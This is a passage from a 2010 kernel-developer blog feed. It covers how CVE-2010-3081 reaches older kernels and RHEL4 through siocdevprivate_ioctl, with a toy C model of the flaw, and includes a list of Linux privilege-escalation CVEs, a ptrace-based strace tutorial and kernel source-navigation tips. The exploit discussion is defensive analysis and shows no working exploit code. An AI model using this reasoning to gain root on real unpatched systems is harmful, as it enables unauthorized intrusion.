make <code>compat_alloc_user_space</code> return any value you please!</p>

<p>The condition for exploitability thus drops from &#8220;user-controlled
<code>len</code> and no <code>access_ok</code>&#8221; to simply &#8220;no <code>access_ok</code>&#8221;.</p>

<p>This is interesting, because it turns out that some very old kernels, before
2.6.11, including RHEL 4, have the following function:</p>

<pre><code>int siocdevprivate_ioctl(unsigned int fd, unsigned int cmd, unsigned long arg)
{
        struct ifreq __user *u_ifreq64;

        ...
        u_ifreq64 = compat_alloc_user_space(sizeof(*u_ifreq64));

        /* Don't check these user accesses, just let that get trapped
         * in the ioctl handler instead.
         */
        copy_to_user(&amp;u_ifreq64-&gt;ifr_ifrn.ifrn_name[0], &amp;tmp_buf[0], IFNAMSIZ);
        __put_user(data64, &amp;u_ifreq64-&gt;ifr_ifru.ifru_data);

        return sys_ioctl(fd, cmd, (unsigned long) u_ifreq64);
}
</code></pre>

<p>Remember, we can make <code>compat_alloc_user_space</code> return an arbitrary
value. The <code>copy_to_user</code> will call <code>access_ok</code> and fail, but that
return value will be discarded, and the <code>__put_user</code> will scribble 32
bits of user-controlled data at a user-controlled address. Bingo,
local root.</p>
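
<p>The shape of that mistake can be modelled in a few lines of ordinary C. This is a toy, not kernel code: memory is a small array, offsets below <code>TOY_USER_LIMIT</code> play the role of userspace, and every <code>toy_</code> name is hypothetical. It shows a checked copy whose failure is ignored, followed by an unchecked store to the same region.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define TOY_MEM_SIZE   64u
#define TOY_USER_LIMIT 32u   /* offsets below this are "user", the rest "kernel" */

static unsigned char toy_mem[TOY_MEM_SIZE];

/* Range check in the spirit of access_ok(), over toy offsets. */
static int toy_offset_ok(uint32_t off, uint32_t size)
{
    return size <= TOY_USER_LIMIT && off <= TOY_USER_LIMIT - size;
}

/* Checked copy, like copy_to_user(): returns the number of bytes NOT copied. */
unsigned toy_copy_to_user(uint32_t off, const void *src, uint32_t size)
{
    if (!toy_offset_ok(off, size))
        return size;
    memcpy(&toy_mem[off], src, size);
    return 0;
}

/* Unchecked store, like __put_user(): the caller is trusted to have checked. */
void toy_put_user_unchecked(uint32_t val, uint32_t off)
{
    memcpy(&toy_mem[off], &val, sizeof val);
}

/* Shape of the vulnerable function: the failed checked copy is ignored,
 * then the unchecked store goes ahead anyway. */
void toy_siocdevprivate(uint32_t u_ifreq, uint32_t data)
{
    const char name[4] = "eth";
    (void)toy_copy_to_user(u_ifreq, name, sizeof name);  /* result discarded */
    toy_put_user_unchecked(data, u_ifreq + 4);           /* no check at all */
}
```

<p>Calling <code>toy_siocdevprivate(40, 0xdeadbeef)</code> leaves the name bytes at offset 40 untouched, because the checked copy refused, but the value still lands at offset 44, inside the &#8220;kernel&#8221; half of the array.</p>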

<p>It turns out this function was present in Linux 2.4.x, too, meaning
that this exploit even affected RHEL3 and anyone else still running a
2.4-based system!</p>

<p>Using this observation, I&#8217;ve produced a working proof-of-concept
exploit for RHEL4, based on the released exploit for RHEL5. Contact me
if you&#8217;re interested, but it&#8217;s pretty straightforward.</p>

<h2>Closing notes</h2>

<p>As far as I know, neither of these facts has been publicly
documented prior to this post. I shared this information with Red Hat,
and they requested I keep it private until they released fixes for
RHEL 3, which happened last week. I would not be at all surprised to
learn that someone else has private exploits that incorporate either
or both of these observations, though.</p>

<p>One important moral here is that you must be <em>very careful</em> when declaring
a system unaffected by a vulnerability, or declaring a mitigation to
be complete. Software systems have gotten tremendously complex, and
it&#8217;s often impossible to be totally confident you understand every
last way an attacker could tickle a vulnerability.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A brief look at Linux&#8217;s security record</title>
		<link>http://blog.nelhage.com/2010/09/a-brief-look-at-linuxs-security-record/</link>
		<comments>http://blog.nelhage.com/2010/09/a-brief-look-at-linuxs-security-record/#comments</comments>
		<pubDate>Mon, 27 Sep 2010 03:16:19 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=343</guid>
		<description><![CDATA[After the fuss of the last two weeks because of CVE-2010-3081 and CVE-2010-3301, I decided to take a look at a handful of the high-profile privilege escalation vulnerabilities in Linux from the last few years. So, here&#8217;s a summary of the ones I picked out. There are also a large number of smaller ones, like [...]]]></description>
			<content:encoded><![CDATA[<p>After the fuss of the last two weeks because of <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081">CVE-2010-3081</a> and <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3301">CVE-2010-3301</a>, I decided to take a look at a handful of the high-profile privilege escalation vulnerabilities in Linux from the last few years.
</p>

<p>
So, here&#8217;s a summary of the ones I picked out. There are also a large number of smaller ones, like an <a href="http://sota.gen.nz/af_can/"><code>AF&#95;CAN</code></a> exploit, or the <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1084">l2cap</a> overflow in the Bluetooth subsystem, that didn&#8217;t get as much publicity, because they were found more quickly or didn&#8217;t affect as many default configurations.
</p>
<table border="2" cellspacing="0" cellpadding="6" rules="groups" frame="hsides">
<col align="left"></col><col align="left"></col><col align="right"></col><col align="right"></col><col align="left"></col>
<thead>
<tr><th>CVE name</th><th>Nickname</th><th>Introduced</th><th>Fixed</th><th>Notes</th></tr>
</thead>
<tbody>
<tr><td>CVE-2006-2451</td><td><code>prctl</code></td><td>2.6.13</td><td>2.6.17.4</td><td></td></tr>
<tr><td>CVE-2007-4573</td><td><code>ptrace</code></td><td>2.4.x</td><td>2.6.22.7</td><td>64-bit only</td></tr>
<tr><td>CVE-2008-0009</td><td><code>vmsplice</code> (1)</td><td>2.6.22</td><td>2.6.24.1</td><td></td></tr>
<tr><td>CVE-2008-0600</td><td><code>vmsplice</code> (2)</td><td>2.6.17</td><td>2.6.24.2</td><td></td></tr>
<tr><td>CVE-2009-2692</td><td><code>sock&#95;sendpage</code></td><td>2.4.x</td><td>2.6.31</td><td><code>mmap&#95;min&#95;addr</code> helped <sup><a class="footref" name="fnr.1" href="#fn.1">1</a></sup></td></tr>
<tr><td>CVE-2010-3081</td><td><code>compat&#95;alloc&#95;user&#95;space</code></td><td>2.6.26<sup><a class="footref" name="fnr.2" href="#fn.2">2</a></sup></td><td>2.6.36</td><td></td></tr>
<tr><td>CVE-2010-3301</td><td><code>ptrace</code> (redux)</td><td>2.6.27</td><td>2.6.36</td><td>64-bit only</td></tr>
</tbody>
</table>

<p>
I&#8217;ll probably have some more to say about these bugs in the future, but here are a few thoughts:
</p>

<p><ul>
<li>
At least two of these bugs existed since the 2.4 days. So no matter what kernel you&#8217;ve been running, you had privilege escalation bugs you didn&#8217;t know about for as long as you were running that kernel. We don&#8217;t know whether or not the blackhats knew about them, but are you feeling lucky?
</li>
<li>
I bet there are at least a few more privesc bugs dating back to 2.4 we haven&#8217;t found yet.
</li>
<li>
If you run a Linux machine with untrusted local users, or with services that are at risk of being compromised (e.g. your favorite shitty PHP webapp), you&#8217;d better have a story for how you&#8217;re dealing with these bugs, including the fact that some of them were privately known for years before they were announced.
</li>
<li>
It&#8217;s not clear from this sample that the kernel is getting more secure over time. I suspect we&#8217;re getting better at finding bugs, particularly now that companies like Google are paying researchers to audit the kernel, but it&#8217;s not obvious we&#8217;re getting better at not introducing them in the first place. Certainly CVE-2010-3301 is pretty embarrassing, being a reintroduction of a bug that had been fixed seven months previously.
</li>
</ul></p>

<div id="footnotes">
<h2 class="footnotes">Footnotes: </h2>
<div id="text-footnotes">
<p class="footnote"><sup><a class="footnum" name="fn.1" href="#fnr.1">1</a></sup> <code>mmap_min_addr</code> mitigated this bug to a DoS, but several bugs that allowed attackers to get around that restriction were announced at the same time.
</p>
<p class="footnote"><sup><a class="footnum" name="fn.2" href="#fnr.2">2</a></sup> The public exploit relies on a call path introduced in 2.6.26, but observers have pointed out <a href="http://www.webhostingtalk.com/showpost.php?p=7026467&#038;postcount=192">the possibility</a> of exploit vectors affecting older kernels.
</p>
</div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/09/a-brief-look-at-linuxs-security-record/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Write yourself an strace in 70 lines of code</title>
		<link>http://blog.nelhage.com/2010/08/write-yourself-an-strace-in-70-lines-of-code/</link>
		<comments>http://blog.nelhage.com/2010/08/write-yourself-an-strace-in-70-lines-of-code/#comments</comments>
		<pubDate>Sun, 29 Aug 2010 16:33:26 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Software Engineering]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[ptrace]]></category>
		<category><![CDATA[software]]></category>
		<category><![CDATA[strace]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=300</guid>
		<description><![CDATA[Basically anyone who&#8217;s used Linux for any amount of time eventually comes to know and love the strace command. strace is the system-call tracer, which traces the calls that a program makes into the kernel in order to interact with the outside world. If you&#8217;re not already familiar with this incredibly versatile tool, I suggest [...]]]></description>
			<content:encoded><![CDATA[<p>Basically anyone who&#8217;s used Linux for any amount of time eventually
comes to know and love the <a href="http://linux.die.net/man/1/strace"><code>strace</code></a> command. <code>strace</code> is the
system-call tracer, which traces the calls that a program makes into
the kernel in order to interact with the outside world. If you&#8217;re not
already familiar with this incredibly versatile tool, I suggest you go
check out my friend and coworker Greg Price&#8217;s excellent <a href="http://blog.ksplice.com/2010/08/strace-the-sysadmins-microscope/">blog
post</a> on the subject, and then come back here.</p>

<p>We all love strace, but have you ever wondered how it works? How does
it interject itself between the kernel and the userspace program? This
post will walk through a minimal implementation of <code>strace</code> in about
70 lines of C. It won&#8217;t be nearly as functional as the real thing, but
in the process you&#8217;ll learn most of what you need to know about the
core interfaces it uses.</p>

<p>On Linux (and probably some other UNIXes) <code>strace</code> uses a somewhat
arcane interface known as <a href="http://linux.die.net/man/2/ptrace"><code>ptrace</code></a>, the process-tracing
interface. <code>ptrace</code> allows one process to monitor the status of
another process, and to inspect (or even manipulate) its internal
state.</p>

<p><code>ptrace</code> is a complex system call, taking a magic &#8220;request&#8221; first
parameter, and doing completely different things depending on its
value. Its general prototype looks like:</p>

<pre><code>long ptrace(enum __ptrace_request request, pid_t pid, void *addr, void *data);
</code></pre>

<p>However, because different values of <code>request</code> use anywhere from zero
to three of the remaining parameters, <code>glibc</code> prototypes it as a
varargs function, allowing a developer to list only as many
parameters as a given call needs.</p>

<p>In order for one process to trace another, it attaches to that
process, and temporarily becomes that process&#8217;s parent. When a process
is <code>ptrace</code>d, the tracer can ask for the child to stop whenever
various events happen, such as the child making a system call. When
this happens, the kernel will stop the child with <code>SIGTRAP</code>. Since the
tracer is now the child&#8217;s parent, it can thus watch for this using the
standard UNIX <code>waitpid</code> system call.</p>
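
<p>Everything the tracer learns arrives through the status word that
<code>waitpid</code> fills in, so it helps to see how that word is taken apart. This
is a minimal sketch using the standard wait macros; <code>describe_status</code>
is a hypothetical helper name, not part of the program built below.</p>

<pre><code>#include &lt;stdio.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/wait.h&gt;

/* Write a short description of a waitpid() status into buf. */
static void describe_status(int status, char *buf, size_t len) {
    if (WIFEXITED(status))
        snprintf(buf, len, "exited with code %d", WEXITSTATUS(status));
    else if (WIFSIGNALED(status))
        snprintf(buf, len, "killed by signal %d", WTERMSIG(status));
    else if (WIFSTOPPED(status))
        snprintf(buf, len, "stopped by signal %d", WSTOPSIG(status));
    else
        snprintf(buf, len, "unrecognized status 0x%x", (unsigned)status);
}
</code></pre>

<p>A tracer mostly cares about the third case: a traced child that stops shows
up as <code>WIFSTOPPED</code>, and <code>WSTOPSIG</code> says which signal stopped it.</p>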

<p>Our miniature <code>strace</code> will only support the <code>strace COMMAND</code> form of
<code>strace</code> (as opposed to <code>strace -p</code>), and we&#8217;ll only print syscall
numbers and return values &#8212; no decoding of names or arguments or
anything. So a sample run might look like:</p>

<pre><code>$ ./ministrace ls
…
syscall(6) = 0
syscall(54) = 0
syscall(54) = 0
syscall(5) = 3
syscall(221) = 1
syscall(220) = 272
syscall(220) = 0
syscall(6) = 0
syscall(197) = 0
syscall(192) = -1219706880
…
</code></pre>

<p>Not the most useful thing in the world, but it shows off the core
tracing tools. So, let&#8217;s see the code:</p>

<pre><code>#include &lt;sys/ptrace.h&gt;
#include &lt;sys/reg.h&gt;
#include &lt;sys/wait.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;stdio.h&gt;
#include &lt;errno.h&gt;
#include &lt;string.h&gt;
</code></pre>

<p>We start with the necessary headers. <code>sys/ptrace.h</code> defines <code>ptrace</code>
and the <code>__ptrace_request</code> constants, and we&#8217;ll need <code>sys/reg.h</code> to
help decode system calls. More about that later. Everything else you
should probably recognize.</p>

<pre><code>int do_child(int argc, char **argv);
int do_trace(pid_t child);

int main(int argc, char **argv) {
    if (argc &lt; 2) {
        fprintf(stderr, "Usage: %s prog args\n", argv[0]);
        exit(1);
    }

    pid_t child = fork();
    if (child == 0) {
        return do_child(argc-1, argv+1);
    } else {
        return do_trace(child);
    }
}
</code></pre>

<p>We&#8217;ll start with the entry point. We check that we were passed a
command, and then we <code>fork()</code> to create two processes &#8212; one to
execute the program to be traced, and the other to trace it.</p>

<pre><code>int do_child(int argc, char **argv) {
    char *args [argc+1];
    memcpy(args, argv, argc * sizeof(char*));
    args[argc] = NULL;
</code></pre>

<p>The child starts with some trivial marshalling of arguments, since
<code>execvp</code> wants a <code>NULL</code>-terminated argument array.</p>

<pre><code>    ptrace(PTRACE_TRACEME);
    kill(getpid(), SIGSTOP);
    return execvp(args[0], args);
}
</code></pre>

<p>Next, we just execute the provided argument list, but first, we need
to start the tracing process, so that the parent can start tracing the
newly-executed program from the very start.</p>

<p>If a child knows that it wants to be traced, it can make the
<code>PTRACE_TRACEME</code> <code>ptrace</code> request, which starts tracing. In addition,
it means that the next signal sent to this process will stop it and
notify the parent (via <code>wait</code>), so that the parent knows to start
tracing. So, after doing a <code>TRACEME</code>, we <code>SIGSTOP</code> ourselves, so that
the parent can continue our execution with the <code>exec</code> call.</p>

<p>(You might have noticed that <code>strace COMMAND</code> output always starts
with an <code>execve</code> call. Now you should understand why &#8212; we&#8217;re actually
going to start tracing immediately after the <code>kill</code> returns, so we see
the <code>execve</code> call that starts the new program).</p>
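
<p>The handshake can be tried in isolation, without the <code>exec</code>. The sketch
below assumes <code>ptrace</code> is permitted in your environment (some sandboxes
block it); <code>trace_handshake</code> is a hypothetical name, and the child simply
exits instead of running a program.</p>

<pre><code>#include &lt;signal.h&gt;
#include &lt;sys/ptrace.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/wait.h&gt;
#include &lt;unistd.h&gt;

/* Returns 1 if the parent observed the child's initial SIGSTOP,
 * 0 if the child did something else, and -1 if fork/waitpid failed. */
static int trace_handshake(void) {
    int status, saw_stop;
    pid_t child = fork();
    if (child &lt; 0)
        return -1;
    if (child == 0) {
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)
            _exit(2);                 /* tracing not available */
        kill(getpid(), SIGSTOP);      /* parent's waitpid() wakes up here */
        _exit(0);                     /* reached once the parent resumes us */
    }
    if (waitpid(child, &amp;status, 0) != child)
        return -1;
    saw_stop = WIFSTOPPED(status) &amp;&amp; WSTOPSIG(status) == SIGSTOP;
    if (saw_stop) {
        ptrace(PTRACE_CONT, child, NULL, NULL);  /* resume, deliver no signal */
        waitpid(child, &amp;status, 0);              /* reap the exit */
    }
    return saw_stop;
}
</code></pre>

<p>Note that the parent&#8217;s plain <code>waitpid(child, &amp;status, 0)</code> reports the stop
only because the child is being traced; without <code>PTRACE_TRACEME</code> it would
need <code>WUNTRACED</code> to see it.</p>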

<pre><code>int wait_for_syscall(pid_t child);

int do_trace(pid_t child) {
    int status, syscall, retval;
    waitpid(child, &amp;status, 0);
</code></pre>

<p>In the parent, meanwhile, we prototype a function we&#8217;ll need later,
and start tracing. We immediately <code>waitpid</code> on the child, which will
return once the child has sent itself the <code>SIGSTOP</code> above, and is
ready to be traced.</p>

<pre><code>    ptrace(PTRACE_SETOPTIONS, child, 0, PTRACE_O_TRACESYSGOOD);
</code></pre>

<p>I mentioned earlier that <code>ptrace</code> turns basically all events into a
<code>SIGTRAP</code> on the child. This is inconvenient because it means that
when you see the child has stopped due to <code>SIGTRAP</code>, there&#8217;s no good
way to know which of several possible reasons it stopped for.</p>

<p><code>PTRACE_SETOPTIONS</code> lets us set a number of options for how we want to
trace the child. We use it here to set <code>PTRACE_O_TRACESYSGOOD</code>, which
means that when the child stops for a syscall-related reason, we&#8217;ll
actually see it stopped with signal number <code>SIGTRAP | 0x80</code>, so we can
easily distinguish syscall stops from other stops. Since (for the
purposes of this demo), we only care about syscalls, this is very
convenient.</p>

<pre><code>    while(1) {
        if (wait_for_syscall(child) != 0) break;
</code></pre>

<p>Now we enter the tracing loop. <code>wait_for_syscall</code>, defined below, will
run the child until either entry to or exit from a system call. If it
returns non-zero, the child has exited and we end the loop.</p>

<pre><code>        syscall = ptrace(PTRACE_PEEKUSER, child, sizeof(long)*ORIG_EAX);
        fprintf(stderr, "syscall(%d) = ", syscall);
</code></pre>

<p>Otherwise, though, we know that the child is entering a system call,
and so we need to decode the system call number (and potentially
arguments, if this were a less toy example). The <code>PTRACE_PEEKUSER</code>
<code>ptrace</code> request reads a word of data from the child&#8217;s &#8220;user area&#8221;,
which is a logical area that holds all of its registers and other
internal non-memory state. On i386, the syscall number lives in
<code>%eax</code>. For various technical reasons, however, the kernel has already
clobbered the child&#8217;s <code>%eax</code> at this point, but it saves the original
value at a different offset, <code>ORIG_EAX</code>, which comes from
<code>sys/reg.h</code>.</p>

<pre><code>        if (wait_for_syscall(child) != 0) break;
</code></pre>

<p>Once we have the syscall number, we <code>wait_for_syscall</code> again, which
should leave us stopped at the syscall return.</p>

<pre><code>        retval = ptrace(PTRACE_PEEKUSER, child, sizeof(long)*EAX);
        fprintf(stderr, "%d\n", retval);
</code></pre>

<p>Return values on i386 are also passed in <code>%eax</code>, so this time we can
read it directly and print the return value, and then return to the
top of the loop to wait for the next syscall.</p>

<pre><code>     }
    return 0;
}
</code></pre>

<p>And once the child exits, we just return.</p>
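
<p>The <code>ORIG_EAX</code> and <code>EAX</code> offsets used in this loop are specific to
i386. As a rough sketch of what a more portable version might look up, assuming
glibc&#8217;s <code>sys/reg.h</code> on x86 and a tracer built for the same architecture as the
child, the offsets can be collected in one place. The struct and function names
here are hypothetical.</p>

<pre><code>#include &lt;stddef.h&gt;
#if defined(__i386__) || defined(__x86_64__)
#include &lt;sys/reg.h&gt;
#endif

/* Byte offsets into the ptrace "user area"; -1 means "not handled here". */
struct syscall_regs {
    long number;     /* syscall number, as saved at syscall entry */
    long retval;     /* return value, valid at syscall exit */
    long args[6];    /* argument registers, in argument order */
};

static struct syscall_regs syscall_reg_offsets(void) {
    const long w = (long)sizeof(long);
#if defined(__x86_64__)
    struct syscall_regs r = { w * ORIG_RAX, w * RAX,
        { w * RDI, w * RSI, w * RDX, w * R10, w * R8, w * R9 } };
#elif defined(__i386__)
    struct syscall_regs r = { w * ORIG_EAX, w * EAX,
        { w * EBX, w * ECX, w * EDX, w * ESI, w * EDI, w * EBP } };
#else
    struct syscall_regs r = { -1, -1, { -1, -1, -1, -1, -1, -1 } };
    (void)w;
#endif
    return r;
}
</code></pre>

<p>With this in hand, the syscall number would be read with something like
<code>ptrace(PTRACE_PEEKUSER, child, r.number, NULL)</code>, and the first argument
with <code>r.args[0]</code> in place of <code>r.number</code>.</p>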

<pre><code>int wait_for_syscall(pid_t child) {
    int status;
    while (1) {
        ptrace(PTRACE_SYSCALL, child, 0, 0);
</code></pre>

<p><code>wait_for_syscall</code> is a simple helper function. We continue the child
using <code>PTRACE_SYSCALL</code>, which allows a stopped child to continue
executing until the next entry to or exit from a system call.</p>

<pre><code>        waitpid(child, &amp;status, 0);
</code></pre>

<p>We then <code>waitpid</code> to wait for something interesting to happen in the
child.</p>

<pre><code>        if (WIFSTOPPED(status) &amp;&amp; WSTOPSIG(status) &amp; 0x80)
            return 0;
</code></pre>

<p>Because of the <code>PTRACE_O_TRACESYSGOOD</code> we set above, we can detect a
syscall stop by checking if the child was stopped by a signal with the
high bit set. If so, we return.</p>

<pre><code>        if (WIFEXITED(status))
            return 1;
    }
}
</code></pre>

<p>If the child exited, we&#8217;re done here; Otherwise, it stopped for some
reason we don&#8217;t care about (like an <code>execve</code>, for instance), and so we
loop to start it again until it hits a syscall.</p>
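
<p>The check above tests only the high bit. Since <code>PTRACE_O_TRACESYSGOOD</code>
makes syscall stops report exactly <code>SIGTRAP | 0x80</code>, a slightly stricter
predicate is possible. This is a sketch; <code>is_syscall_stop</code> is a hypothetical
helper name.</p>

<pre><code>#include &lt;signal.h&gt;
#include &lt;sys/wait.h&gt;

/* True only for the syscall stops that PTRACE_O_TRACESYSGOOD marks. */
static int is_syscall_stop(int status) {
    return WIFSTOPPED(status) &amp;&amp; WSTOPSIG(status) == (SIGTRAP | 0x80);
}
</code></pre>

<p>A plain <code>SIGTRAP</code> stop, or a stop caused by any other signal, fails this
test and falls through to the rest of the loop.</p>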

<p>And that&#8217;s all there is to it. You can find the version I just posted on
<a href="http://github.com/nelhage/ministrace/tree/for-blog">github</a> if you want to download and try it out.</p>

<h2>Making it more useful</h2>

<p>While it works, the previous version isn&#8217;t exactly what I&#8217;d call particularly
helpful. You have to decode the syscall numbers by hand, and you don&#8217;t get any
syscall arguments.</p>

<p>It&#8217;s a little long to include in the post, but I&#8217;ve pushed a slightly more
functional version to <a href="http://github.com/nelhage/ministrace/tree/master">master</a> in the same github repository. It
includes a Python script to scan the Linux source to pick up syscall numbers and
argument counts and types, and it knows how to decode string arguments, so that
you can see filenames and <code>read</code> and <code>write</code> data.</p>

<p>Reading arguments is easy &#8212; on i386, they&#8217;re passed in registers, so it&#8217;s just
another <code>PTRACE_PEEKUSER</code> for each argument. Perhaps the most interesting piece
is the <code>read_string</code> function, which is used to read a NULL-terminated string
from the child process. (Of course, NULL-terminated isn&#8217;t quite right &#8212; the
real strace knows about the <code>count</code> arguments to <code>read()</code> and <code>write()</code>, for
instance. But it&#8217;s close enough for a demo):</p>

<pre><code>char *read_string(pid_t child, unsigned long addr) {
</code></pre>

<p><code>read_string</code> takes a child to read from, and the address of the string it&#8217;s
going to read.</p>

<pre><code>    char *val = malloc(4096);
    int allocated = 4096, read = 0;
    unsigned long tmp;
</code></pre>

<p>We need some variables. A buffer to copy the string into, counters of how much
data we&#8217;ve copied and allocated, and a temporary variable for reading memory.</p>

<pre><code>    while (1) {
        if (read + sizeof tmp &gt; allocated) {
            allocated *= 2;
            val = realloc(val, allocated);
        }
</code></pre>

<p>We grow the buffer if necessary. We read data one word at a time.</p>

<pre><code>        tmp = ptrace(PTRACE_PEEKDATA, child, addr + read);
        if(errno != 0) {
            val[read] = 0;
            break;
        }
</code></pre>

<p><code>PTRACE_PEEKDATA</code> returns a work of data from the child at the specified
offset. Because it uses its return for the value, we need to check <code>errno</code> to
tell if it failed. If it did (perhaps because the child passed an invalid
pointer), we just return the string we&#8217;ve got so far, making sure to add our own
NULL at the end.</p>

<pre><code>        memcpy(val + read, &amp;tmp, sizeof tmp);
        if (memchr(&amp;tmp, 0, sizeof tmp) != NULL)
            break;
        read += sizeof tmp;
</code></pre>

<p>Then it&#8217;s a simple matter of appending the data we read, and breaking out if we
found a terminating NULL, or else looping to read another word.</p>

<pre><code>    }
    return val;
}
</code></pre>
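
<p>The <code>errno</code> dance around <code>PTRACE_PEEKDATA</code> is easy to get wrong, so it
can be worth isolating. Here is one possible wrapper, offered as a sketch rather
than as what the repository does; <code>peek_word</code> is a hypothetical name.</p>

<pre><code>#include &lt;errno.h&gt;
#include &lt;stddef.h&gt;
#include &lt;sys/ptrace.h&gt;
#include &lt;sys/types.h&gt;

/* Read one word from the tracee at addr. Returns 0 and stores the word in
 * *out on success; returns -1 (with errno set by ptrace) on failure. */
static int peek_word(pid_t child, unsigned long addr, unsigned long *out) {
    long word;
    errno = 0;     /* a successful read may legitimately return -1 */
    word = ptrace(PTRACE_PEEKDATA, child, (void *)addr, NULL);
    if (word == -1 &amp;&amp; errno != 0)
        return -1;
    *out = (unsigned long)word;
    return 0;
}
</code></pre>

<p>Separating the status from the data means a word that happens to be all ones
is no longer mistaken for an error.</p>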
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/08/write-yourself-an-strace-in-70-lines-of-code/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Navigating the Linux Kernel</title>
		<link>http://blog.nelhage.com/2010/08/navigating-the-linux-kernel/</link>
		<comments>http://blog.nelhage.com/2010/08/navigating-the-linux-kernel/#comments</comments>
		<pubDate>Mon, 16 Aug 2010 01:52:58 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[source-diving]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=291</guid>
		<description><![CDATA[In response to my query last time, ezyang asked for any tips or tricks I have for finding my way around the Linux kernel. I&#8217;m not sure I have much in the way of systematic advice for tracking down the answers to questions about the Linux kernel, but thinking about what I do when posed [...]]]></description>
			<content:encoded><![CDATA[<p>In response to my query last time, <code>ezyang</code> <a href="http://blog.nelhage.com/2010/08/suggestion-time-what-should-i-blog-about/#comment-2597">asked</a> for any
tips or tricks I have for finding my way around the Linux kernel. I&#8217;m
not sure I have much in the way of systematic advice for tracking down
the answers to questions about the Linux kernel, but thinking about
what I do when posed with a patch to Linux that I need to understand, or a
question I need to answer, I&#8217;ve come up with a collection of tips that
will hopefully be helpful to others looking to source-dive Linux for
whatever reason.</p>

<h2>Know the layout</h2>

<p>It sounds basic, but you probably shouldn&#8217;t be doing any serious
source-diving into the Linux kernel without pausing to familiarize
yourself with the basic layout of the kernel sources. The most
interesting directories are:</p>

<ul>
<li><p><code>fs/</code> &#8212; This directory contains both the VFS implementation (the
generic filesystem code and the top-level implementation of
filesystem syscalls), and specific filesystems, in
subdirectories. If you&#8217;re looking for the implementation of a
filesystem-related system call, it&#8217;s probably in one of <code>fs/*.c</code>.</p></li>
<li><p><code>mm/</code> &#8212; This contains the virtual memory and memory management
subsystems. <code>mmap</code> lives here, as do all of the kernel&#8217;s various
memory allocators, including <code>kmalloc</code> and <code>vmalloc</code>.</p></li>
<li><p><code>kernel/</code> &#8212; This contains the &#8220;core&#8221; kernel code. The scheduler
lives here, as does the implementation of various primitives used
throughout the kernel, like <code>printk</code> and various data
structures. Timer- and process-related system calls live here,
including <code>fork</code> and <code>exit</code>, and most anything related to uids and
pids.</p></li>
<li><p><code>net/</code> is the networking subsystem; much like <code>fs/</code> it contains both
generic code and specific network protocol
implementations. Networking-related system calls are mostly in
<code>net/socket.c</code>.</p></li>
<li><p><code>arch/</code> &#8212; Architecture-specific code lives here, in
<code>arch/ARCHITECTURE/</code>. Per-architecture include files live in
<code>arch/ARCHITECTURE/include/asm/</code>; prior to 2.6.28 they were in
<code>include/asm-ARCH/</code>. <code>arch/</code> directories tend to loosely parallel
the top-level source directory, with <code>kernel/</code> and <code>mm/</code>
subdirectories.</p></li>
</ul>

<h2>Know your git</h2>

<p>I find <code>git</code> is one of the most valuable tools at my disposal when
trying to understand the Linux source. There are large classes of
questions about the source that git makes it easy to answer that I
otherwise would have to resort to something much slower or more
cumbersome to figure out. Some things I&#8217;ve found particularly useful
include:</p>

<ul>
<li><p><code>git grep</code> &#8212; <code>git grep</code> works almost identically to <code>grep</code>, but
by default it searches only the files that git tracks in your working
tree, and it can just as easily search the index or any past revision
straight from git&#8217;s object store. It&#8217;s typically far faster at searching large
trees than the equivalent recursive grep would be, in part because it
knows to ignore files that aren&#8217;t in source control, such as object
files.</p></li>
<li><p><code>git blame</code> &#8212; This one should be familiar to anyone who&#8217;s used
subversion or most any other version control system. This will let
you quickly find the commit that introduced a given line. This gives
you several potential sources of information:</p>

<ul>
<li>The commit message often includes helpful documentation on how a
change was supposed to work or what the bug it was fixing was.</li>
<li>The diff is often a quick way to find other files that are related
to the piece of code you&#8217;re looking at, potentially giving you
other places to look for more related code.</li>
</ul></li>
<li><p><code>git log -S</code> &#8212; while <code>git blame</code> can tell you when a specific line
was introduced, <code>git log -S</code>, also known for some inscrutable reason
as the &#8220;pickaxe&#8221;, will let you know when a specific chunk of code
was introduced. Here&#8217;s how it works:</p>

<p>Suppose I wanted to know when the <code>vmsplice</code> system call was
introduced. A <code>git grep</code> will reveal the line in <code>fs/splice.c</code> that
defines the system call:</p>

<pre><code>SYSCALL_DEFINE4(vmsplice, int, fd, const struct iovec __user *, iov,
                unsigned long, nr_segs, unsigned int, flags)
</code></pre>

<p>I could run <code>git blame</code>, but that points me at commit <code>836f92ad</code>,
which was just one of the commits that introduced the
<code>SYSCALL_DEFINEn</code> wrappers, which isn&#8217;t what I&#8217;m looking for. I
could continue <code>git blame</code>ing from there, but that&#8217;s really not what
I want.</p>

<p>Instead, I can run:</p>

<pre><code>git log -Svmsplice fs/splice.c
</code></pre>

<p>which yields two commits, the earliest of which is the one I want.</p>

<p>So, how does this work? When you use the pickaxe, with <code>-Sstring</code>,
git looks for commits that <em>add</em> or <em>remove</em> an instance of
<strong>string</strong>. It doesn&#8217;t look at the diff or anything &#8212; it simply
counts how often <strong>string</strong> appears before and after the commit, and
